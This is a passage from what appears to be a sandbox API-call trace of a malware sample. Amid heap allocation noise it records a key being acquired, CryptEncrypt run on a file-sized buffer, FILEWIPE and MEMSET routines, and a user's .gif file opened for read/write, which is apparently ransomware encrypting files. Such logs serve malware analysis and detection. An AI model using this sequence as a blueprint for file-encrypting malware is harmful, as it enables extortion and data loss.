(HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0039.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0039.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0039.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0039.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0039.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0039.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0039.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0039.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0039.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0039.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0039.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0039.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0039.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0039.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0039.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0039.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0039.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0039.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0039.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0039.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0039.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0039.732] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0039.732] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0039.732] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.732] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.732] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0039.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.732] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.732] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.733] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.733] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.733] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.733] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.733] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.733] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.733] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0039.734] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.734] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x12195, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x121a0) returned 1 [0039.734] CharLowerBuffW (in: lpsz="byte[74145]", cchLength=0xb | out: lpsz="byte[74145]") returned 0xb [0039.735] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.735] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.735] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9471a8*, pdwDataLen=0x6ae220*=0x12195, dwBufLen=0x121a0 | out: pbData=0x9471a8*, pdwDataLen=0x6ae220*=0x121a0) returned 1 [0039.736] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0039.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.736] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.736] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.743] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0039.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.743] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.743] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.743] CryptDestroyKey (hKey=0x7c2280) returned 1 [0039.744] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0039.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.744] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0039.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0039.744] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0039.745] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0039.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0039.745] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.745] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0039.745] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.745] FreeLibrary (hLibModule=0x754b0000) returned 1 [0039.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0039.746] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0039.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0039.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.746] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2618aff0, ftCreationTime.dwHighDateTime=0x1d5c1d3, ftLastAccessTime.dwLowDateTime=0xd82532f0, ftLastAccessTime.dwHighDateTime=0x1d5c2ea, ftLastWriteTime.dwLowDateTime=0xd82532f0, ftLastWriteTime.dwHighDateTime=0x1d5c2ea, nFileSizeHigh=0x0, nFileSizeLow=0x12195, dwReserved0=0x0, dwReserved1=0x777648, cFileName="77o YBs-VwSh8X3OiiJ.gif", cAlternateFileName="77OYBS~1.GIF")) returned 0x7c2100 [0039.746] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0039.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.746] CharLowerBuffW (in: lpsz="byte[74133]", cchLength=0xb | out: lpsz="byte[74133]") returned 0xb [0039.746] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0039.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.746] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0039.746] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0039.746] FreeLibrary (hLibModule=0x76b40000) returned 1 [0039.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.747] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.747] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0039.748] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.748] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\77o ybs-vwsh8x3oiij.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0039.748] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, 